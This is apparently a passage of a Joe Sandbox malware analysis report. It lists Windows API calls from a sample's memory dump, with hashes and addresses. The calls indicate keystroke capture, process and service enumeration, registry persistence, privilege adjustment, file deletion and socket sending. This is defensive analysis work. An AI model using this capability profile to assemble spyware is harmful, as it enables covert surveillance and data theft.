                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                              • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                                                                                              • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0041CB8F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1665278180-0
                                                                                                                                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                              • API String ID: 0-3177665633
                                                                                                                                                                                                                              • Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3587775597-0
                                                                                                                                                                                                                              • Opcode ID: 486d78d0f154f8101f84bc94c534d203c3f71451808d5e6ba8df6d6aef71c9e0
                                                                                                                                                                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 486d78d0f154f8101f84bc94c534d203c3f71451808d5e6ba8df6d6aef71c9e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0041B489
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0041B4BB
                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0041B529
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0041B536
                                                                                                                                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?), ref: 0041B50C
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041B561
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000), ref: 0041B568
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B570
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041B583
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2341273852-0
                                                                                                                                                                                                                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                                                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                              • String ID: BG
                                                                                                                                                                                                                              • API String ID: 726551946-3469110568
                                                                                                                                                                                                                              • Opcode ID: 9ae3f2eadca4b2b5020d36e28c341c045e358a7d03037eefbbae4030054e5340
                                                                                                                                                                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ae3f2eadca4b2b5020d36e28c341c045e358a7d03037eefbbae4030054e5340
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                              • ToUnicodeEx.USER32(00471BC0,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                                                                                                                                              • String ID: 8[G
                                                                                                                                                                                                                              • API String ID: 3566172867-1691237782
                                                                                                                                                                                                                              • Opcode ID: a0d965aba47a8e542f40a1de740b2151b45cc5136cfd401da1c7b97c9ab4e1ec
                                                                                                                                                                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0d965aba47a8e542f40a1de740b2151b45cc5136cfd401da1c7b97c9ab4e1ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 0040B3B4
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1164774033-0
                                                                                                                                                                                                                              • Opcode ID: 988c4252cbc4f9a865b8055cc2bcd3f2164ab1019b7c92d5eb21c6f644498d3e
                                                                                                                                                                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 988c4252cbc4f9a865b8055cc2bcd3f2164ab1019b7c92d5eb21c6f644498d3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateFindFirst
                                                                                                                                                                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                                                                                                              • API String ID: 41799849-3780268858
                                                                                                                                                                                                                              • Opcode ID: 8108eab9cc88974a967c75d557fbf0c54f16b61a9f659681e047a84f6288adda
                                                                                                                                                                                                                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8108eab9cc88974a967c75d557fbf0c54f16b61a9f659681e047a84f6288adda
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 0040B5B2
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3527384056-0
                                                                                                                                                                                                                              • Opcode ID: 3d273237f76a0f009cea0076f21a444013650bc17707dc3935a88d0b7abe7cb5
                                                                                                                                                                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d273237f76a0f009cea0076f21a444013650bc17707dc3935a88d0b7abe7cb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                                                                                                                                              • GetACP.KERNEL32 ref: 004512BA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F2B
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 00416ADD
                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3534403312-0
                                                                                                                                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: m@E$m@E
                                                                                                                                                                                                                              • API String ID: 0-1909896462
                                                                                                                                                                                                                              • Opcode ID: 09a0945fa07873fb91c821a9c4a5358b420b0090a8a1551dfd4d9694090d3221
                                                                                                                                                                                                                              • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09a0945fa07873fb91c821a9c4a5358b420b0090a8a1551dfd4d9694090d3221
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                              • String ID: x@G$x@G
                                                                                                                                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                              • Opcode ID: 46500d4ce9167a01860be46e5e8a131feb63dedead6af1202102ef74afc63d40
                                                                                                                                                                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46500d4ce9167a01860be46e5e8a131feb63dedead6af1202102ef74afc63d40
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                              • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 806657224-0
                                                                                                                                                                                                                              • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                                                              • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
